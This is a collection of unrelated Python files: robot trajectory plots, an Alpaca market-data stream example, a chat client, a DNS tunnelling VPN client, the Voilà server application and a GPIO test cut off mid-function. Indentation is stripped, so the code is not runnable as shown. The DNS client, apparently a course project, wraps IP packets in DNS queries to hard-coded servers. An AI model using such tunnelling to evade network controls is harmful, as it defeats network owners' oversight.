# plot.plot(timeArray,speedCalculatedListArray[:,4], color = "blue", label="Velocidade Calculada")
# plot.xlabel("Tempo(s)")
# plot.ylabel("Velocidade(rad/s)")
# plot.suptitle("Velocidade - Junta 5")
# plot.legend(loc='upper left')
# plot.figure(7)
# plot.plot(timeArray,speedListArray[:,5], color = "red", label="Velocidade Real")
# plot.plot(timeArray,speedCalculatedListArray[:,5], color = "blue", label="Velocidade Calculada")
# plot.xlabel("Tempo(s)")
# plot.ylabel("Velocidade(rad/s)")
# plot.suptitle("Velocidade - Junta 6")
# plot.legend(loc='upper left')
plot.figure(3)
plot.plot(timeArray_1,normErrorRotationArray_1)
plot.xlabel("Tempo(s)")
plot.ylabel("Erro(rad)")
plot.suptitle("UR5 1 - Erro absoluto - Rotacao")
plot.figure(4)
plot.plot(timeArray_2,normErrorRotationArray_2)
plot.xlabel("Tempo(s)")
plot.ylabel("Erro(rad)")
plot.suptitle("UR5 2 - Erro absoluto - Rotacao")
# plot.figure(9)
# plot.plot(timeArray,wDBarray)
# plot.xlabel("Tempo(s)")
# plot.ylabel("Distância de Singularidade")
# plot.suptitle("Análise de Singularidade")
plot.show()
# fig = plot.figure(5)
# ax = fig.gca(projection='3d')
# ax.plot(poseListArrayUR5_1[:,0],poseListArrayUR5_1[:,1],poseListArrayUR5_1[:,2])
# plot.xlabel("X")
# plot.ylabel("Y")
# plot.zlabel("Z")
# plot.suptitle("Trajetória - UR5 1")
fig = plot.figure(5)
ax = fig.gca(projection='3d')
ax.plot(poseListArrayUR5_1[:,0],poseListArrayUR5_1[:,1], poseListArrayUR5_1[:,2],color = "red", label="Trajetória Real - UR5-1")
ax.plot(trajectoryUR51.database[:,0],trajectoryUR51.database[:,1],trajectoryUR51.database[:,2],color = "blue", label="Trajetória Calculada - UR5-1")
ax.set_xlabel("X")
ax.set_ylabel("Y")
ax.set_zlabel("Z")
fig2 = plot.figure(6)
ax2 = fig2.gca(projection='3d')
ax2.plot(poseListArrayUR5_2[:,0],poseListArrayUR5_2[:,1], poseListArrayUR5_2[:,2],color = "red", label="Trajetória Real - UR5-2")
ax2.plot(trajectoryUR52.database[:,0],trajectoryUR52.database[:,1],trajectoryUR52.database[:,2],color = "blue", label="Trajetória Calculada - UR5-2")
ax2.set_xlabel("X")
ax2.set_ylabel("Y")
ax2.set_zlabel("Z")
ax.legend()
#plot.suptitle("Trajetória - UR5 2")
plot.show()
main(sys.argv) |
dynamic_subscription_example.py | """
In this example code we will show a pattern that allows a user to change
the websocket subscriptions as they please.
"""
import logging
import threading
import asyncio
import time
from alpaca_trade_api import StreamConn
from alpaca_trade_api.common import URL
ALPACA_API_KEY = "<YOUR-API-KEY>"
ALPACA_SECRET_KEY = "<YOUR-SECRET-KEY>"
USE_POLYGON = False
conn: StreamConn = None
def consumer_thread():
try:
# make sure we have an event loop, if not create a new one
loop = asyncio.get_event_loop()
loop.set_debug(True)
except RuntimeError:
asyncio.set_event_loop(asyncio.new_event_loop())
global conn
conn = StreamConn(
ALPACA_API_KEY,
ALPACA_SECRET_KEY,
base_url=URL('https://paper-api.alpaca.markets'),
data_url=URL('https://data.alpaca.markets'),
# data_url=URL('http://127.0.0.1:8765'),
data_stream='polygon' if USE_POLYGON else 'alpacadatav1'
)
@conn.on(r'^AM\..+$')
async def on_minute_bars(conn, channel, bar):
print('bars', bar)
@conn.on(r'Q\..+')
async def on_quotes(conn, channel, quote):
print('quote', quote)
@conn.on(r'T\..+')
async def on_trades(conn, channel, trade):
print('trade', trade)
conn.run(['alpacadatav1/Q.GOOG'])
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
threading.Thread(target=consumer_thread).start()
loop = asyncio.get_event_loop()
time.sleep(5) # give the initial connection time to be established
subscriptions = [['alpacadatav1/AM.TSLA'], ['alpacadatav1/Q.GOOG'],
['alpacadatav1/T.AAPL']]
while 1:
for channels in subscriptions:
loop.run_until_complete(conn.subscribe(channels))
if "AM." in channels[0]:
time.sleep(60) # aggs are once every minute. give it time
else:
time.sleep(20)
|
client.py | import socket
import threading
def receive():
while True:
try:
message = client.recv(1024).decode("ascii")
if message == 'NICK':
nickname = input("Choose a nickname: ")
client.send(nickname.encode("ascii"))
print(client.recv(1024).decode("ascii"))
elif message != "":
print(message)
else:
print("Server Error")
client.close()
break
except:
print("Network Error")
client.close()
break
def write():
while True:
message = input('')
client.send(message.encode("ascii"))
if __name__ == '__main__':
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((input("IP Server: "), 5400))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start() |
client.py | # -*- coding: utf-8 -*-
'''
测试客户端:
- 维护TUN
- 监听数据
- 修改数据包
'''
import logging
import time
import os
import socket
import uuid as UUID_GENERATOR
from threading import Thread
from select import select
from core.dns_handler import Decapsulator, Encapsulator
from core.sys_manage import TunManager
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(filename)s[:%(lineno)d] %(levelname)s %(message)s',
datefmt='%H:%M:%S')
UUID = '779ea091-ad7d-43bf-8afc-8b94fdb576bf'
MTU = 180
BUFFER_SIZE = 4096
KEEPALIVE = 10
DOMAIN_NS_IP = '120.78.166.34'
HOST_NAME = 'group11.cs305.fun'
# HOST_NAME = 'www.ibbb.top'
TUNSETIFF = 0x400454ca
IFF_TUN = 0x0001
IFF_TAP = 0x0002
LOGIN_MSG = b'LOGIN' # 用户登录消息 USER_UUID.LOGIN.hostname.domain
DOWN_MSG = b'DOWN' # 用户下行数据 SESSION_UUID.DOWN.hostname.domain
UP_MSG = b'UP' # 用户上行数据 SESSION_UUID.UP.$BYTE_DATA.hostname.domain
CLOSED_SESSION_MSG = b'CLOSED_SESSION_MSG'
MAX_KEEP_ASK = 1
class SessionExpiredException(Exception):
'''
Expection Trigged when the client detects login out
'''
class Client():
'''
代理客户端
'''
def __init__(self):
'''
初始化代理客户端
- 心跳包管理
- 常规查询包,keep_ask
'''
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.__socket.settimeout(5)
self.init_local_ip()
self.s_uuid = None # UUID for session
self.readables = [self.__socket]
self.tun_fd = None
# self.__keep_alive()
self.keep_ask = MAX_KEEP_ASK
def init_local_ip(self):
'''
获取本机ip
'''
_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
_socket.connect(('8.8.8.8', 80))
self.local_ip = _socket.getsockname()[0]
logging.info('Local IP: %s', self.local_ip)
_socket.close()
def __keep_alive(self):
'''
子线程保持向服务端发送心跳包,以防止服务端清除会话断开隧道连接
'''
def _keepalive():
while True:
time.sleep(KEEPALIVE)
self.__request_down_msg()
c_t_1 = Thread(target=_keepalive, args=(), name='keep_alive')
c_t_1.setDaemon(True)
c_t_1.start()
def __keep_ask(self, keep: bool):
'''
keep_ask:
- 每次发包后置为10
- 每次收到空包-1
- 收包后+1
- 上限为10
'''
if keep and self.keep_ask < MAX_KEEP_ASK:
self.keep_ask += 1
elif not keep and self.keep_ask > 0:
self.keep_ask -= 1
def __handle_login(self):
'''
连接服务端并配置代理隧道\n
创建Tunfd\n
用户登录消息 USER_UUID.LOGIN.hostname.domain
持续登录,失败后等待3秒,知道登录为止
'''
request = Encapsulator.make_fake_request(UUID, LOGIN_MSG, HOST_NAME)
while True:
self.__socket.sendto(request, DOMAIN_NS_ADDR)
logging.info('Send data in DNS request')
response, _addr = self.__socket.recvfrom(2048)
try:
if self.__decode_login_msg(response):
break
except AssertionError:
logging.info('Server Down or Not Detected Login Message')
continue
logging.info('Login Failed, Try later')
time.sleep(3)
logging.info('Connect to server successful')
def __request_up_msg(self, data: bytes):
'''
请求用户上行数据 SESSION_UUID.<UNIQUE_ID>.UP.$BYTE_DATA.hostname.domain
'''
s_uuid = self.s_uuid+'.UP.'+ str(UUID_GENERATOR.uuid1())[:8]
request = Encapsulator.make_fake_request(s_uuid, data, HOST_NAME)
self.__socket.sendto(request, DOMAIN_NS_ADDR)
logging.info('Send data in DNS request')
logging.debug(request)
self.__keep_ask(True)
def __request_down_msg(self):
'''
请求用户下行数据 SESSION_UUID.DOWN.<RANDOM_UUID>.hostname.domain
'''
time.sleep(0.01)
d_uuid = self.s_uuid+'.DOWN'
r_uuid = str(UUID_GENERATOR.uuid1())
request = Encapsulator.make_fake_request(d_uuid, r_uuid.encode(), HOST_NAME)
self.__socket.sendto(request, DOMAIN_NS_ADDR)
logging.info('Send DOWN MSG in DNS request %s', r_uuid)
logging.info(request)
@staticmethod
def __decode_down_msg(response):
'''
解析用户下行数据
'''
rdata = Decapsulator.get_txt_record(response)
if len(rdata) < 1:
logging.debug('No TXT record in response')
return b''
return rdata
def __decode_login_msg(self, response):
'''
解析用户登录响应
'''
name_data = Decapsulator.get_host_name(response)
if name_data[1] != LOGIN_MSG:
logging.debug('Not a Login response <%s>', name_data[1])
return False
try:
txt_record = Decapsulator.get_txt_record(response)
txt_record = txt_record.decode()
except UnicodeDecodeError:
logging.error('Wrong Login response: %s', txt_record)
time.sleep(1)
return False
self.tun_fd, tun_name = TunManager.create_tunnel()
self.readables.append(self.tun_fd)
_login_response = txt_record.split(';')
if len(_login_response) != 3:
logging.debug('Not a Login response <%s>', txt_record)
return False
self.s_uuid, local_ip, peer_ip = _login_response
logging.info('Session UUID: %s \tLocal ip: %s\tPeer ip: %s', self.s_uuid, local_ip, peer_ip)
TunManager.start_tunnel(tun_name, local_ip, peer_ip, MTU)
logging.info('Create Tun Successfully! Tun ID = %d', self.tun_fd)
return True
def __handle_dns_response(self, response):
'''
处理UDP客户端接受的
'''
name_data = Decapsulator.get_host_name(response)
if name_data[1] == LOGIN_MSG: # b'LOGIN':
logging.error('Ignore Server Response: Already Login')
return
if name_data[1] == DOWN_MSG: # b'DOWN':
logging.debug('Receive Packet from server %s', name_data[2][:8])
bytes_write = self.__decode_down_msg(response)
if bytes_write == CLOSED_SESSION_MSG:
# 重新登录
# - 关闭旧的session, 原地发起登录请求
logging.info('客户端掉线,重新登录')
# - 删除旧的文件描述符
os.close(self.readables[1])
self.readables = [self.__socket]
raise SessionExpiredException
if bytes_write is not None and len(bytes_write) > 20:
# Check if IPPacket
# logging.info(IPPacket.str_info(bytes_write))
logging.debug('Write data into TUN')
logging.info(bytes_write)
os.write(self.tun_fd, bytes_write)
# 收到数据包后+1
self.__keep_ask(True)
else:
# 收到空包后-1
self.__keep_ask(False)
return
if name_data[1] == UP_MSG: # b'UP'
logging.debug('Server Response Invalid Question')
return
def __handle_forwarding(self):
'''
客户端登录后的转发行为
'''
while True:
readable_fd = select(self.readables, [], [], 10)[0]
for _fd in readable_fd:
if _fd == self.__socket:
response, _addr = self.__socket.recvfrom(2048)
self.__handle_dns_response(response)
else:
# 将从Tun拿到的IP包发送给代理服务器
ip_packet = os.read(self.tun_fd, BUFFER_SIZE)
logging.debug('Get outbounding data from TUN')
self.__request_up_msg(ip_packet)
# 发送心跳包,尝试接受数据
logging.debug('keep_ask = [%d]', self.keep_ask)
if self.keep_ask > 0:
logging.info('Try To Receive Data [%d]', self.keep_ask)
self.__request_down_msg()
def run_forever(self):
'''
运行代理客户端
'''
logging.info('Start connect to server...')
self.__handle_login()
while True:
try:
self.__handle_forwarding()
except SessionExpiredException:
logging.error('SessionExpiredException')
self.__handle_login()
continue
except KeyboardInterrupt:
# TODO: close the connection
raise KeyboardInterrupt
if __name__ == '__main__':
DOMAIN_NS_ADDR = ('120.78.166.34', 53)
# DOMAIN_NS_ADDR = ('8.8.8.8', 53)
DOMAIN_NS_ADDR = ('18.162.114.192', 53)
# DOMAIN_NS_ADDR = ('18.162.51.192', 53) # 29 Kbps => 140kbps
try:
Client().run_forever()
except KeyboardInterrupt:
logging.info('Closing vpn client ...')
|
app.py | #############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyterlab_server.themes_handler import ThemesHandler
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
from .shutdown_kernel_handler import VoilaShutdownKernelHandler
from .voila_kernel_manager import voila_kernel_manager_factory
from .query_parameters_handler import QueryStringSocketHandler
from .utils import create_include_assets_functions
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{
'Voila': {'log_level': logging.DEBUG},
'VoilaConfiguration': {'show_tracebacks': True},
},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload to server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions',
'show_tracebacks': 'VoilaConfiguration.show_tracebacks',
'preheat_kernel': 'VoilaConfiguration.preheat_kernel',
'pool_size': 'VoilaConfiguration.default_pool_size'
}
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to Voilà API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overridable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
self.contents_manager = LargeFileManager(parent=self)
preheat_kernel: bool = self.voila_configuration.preheat_kernel
pool_size: int = self.voila_configuration.default_pool_size
kernel_manager_class = voila_kernel_manager_factory(
self.voila_configuration.multi_kernel_manager_class,
preheat_kernel,
pool_size
)
self.kernel_manager = kernel_manager_class(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
(
url_path_join(self.server_url, r'/voila/themes/(.*)'),
ThemesHandler,
{
'themes_url': '/voila/themes',
'path': '',
'labextensions_path': jupyter_path('labextensions'),
'no_cache_paths': ['/']
},
),
(url_path_join(self.server_url, r'/voila/api/shutdown/(.*)'), VoilaShutdownKernelHandler)
])
if preheat_kernel:
handlers.append(
(
url_path_join(self.server_url, r'/voila/query/%s' % _kernel_id_regex),
QueryStringSocketHandler
)
)
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def listen(self):
success = False
for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port, self.ip)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
include_assets_functions = create_include_assets_functions(self.voila_configuration.template, url)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(
open_url=url, base_url=url,
theme=self.voila_configuration.theme,
**include_assets_functions
))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
test_gpio.py | #
# Microchip Peripheral I/O
#
# Joshua Henderson <joshua.henderson@microchip.com>
# Copyright (C) 2017 Microchip Technology Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import os
import threading
import time
import unittest
from mpio import GPIO
if sys.version_info[0] == 3:
raw_input = input
import queue
else:
import Queue as queue
pin_input = int(os.environ.get('GPIO_INPUT', "121"))
pin_output = int(os.environ.get('GPIO_OUTPUT', "123"))
class TestGeneral(unittest.TestCase):
def test_open_close(self):
gpio = GPIO(pin_output, "in")
self.assertTrue(gpio.mode == "in")
self.assertTrue(gpio.pin == pin_output)
self.assertTrue(gpio.fd > 0)
gpio.close()
# this test requires GPIO_INPUT and GPIO_OUTPUT to be tied together
def test_loopback(self):
gpio_in = GPIO(pin_input, GPIO.IN)
gpio_out = GPIO(pin_output, GPIO.OUT)
self.assertTrue(gpio_in.mode == "in")
self.assertTrue(gpio_out.mode == "out")
gpio_out.set(False)
self.assertTrue(gpio_in.get() == False)
gpio_out.set(True)
self.assertTrue(gpio_in.get() == True)
gpio_out.set(False)
self.assertTrue(gpio_in.get() == False)
gpio_in.close()
gpio_out.close()
# this test requires GPIO_INPUT and GPIO_OUTPUT to be tied together
def test_loopback_async(self):
gpio_in = GPIO(pin_input, "in")
gpio_out = GPIO(pin_output, "out")
# Wrapper for running poll() in a thread
def threaded_poll(gpio, timeout):
ret = queue.Queue()
def f():
ret.put(gpio.poll(timeout))
thread = threading.Thread(target=f)
thread.start()
return ret
# gpio_in.edge = "falling"
# poll_ret = threaded_poll(gpio_in, 5)
# time.sleep(1)
# gpio_out.set(False)
# self.assertTrue(poll_ret.get() == True)
# self.assertTrue(gpio_in.get() == False)
# poll_ret = threaded_poll(gpio_in, 2)
# time.sleep(1)
# gpio_out.set(False)
# self.assertTrue(poll_ret.get() == False)
# self.assertTrue(gpio_in.get() == False)
# gpio_in.edge = "rising"
# poll_ret = threaded_poll(gpio_in, 5)
# time.sleep(1)
# gpio_out.set(True)
# self.assertTrue(poll_ret.get() == True)
# self.assertTrue(gpio_in.get() == True)
# poll_ret = threaded_poll(gpio_in, 2)
# time.sleep(1)
# gpio_out.set(True)
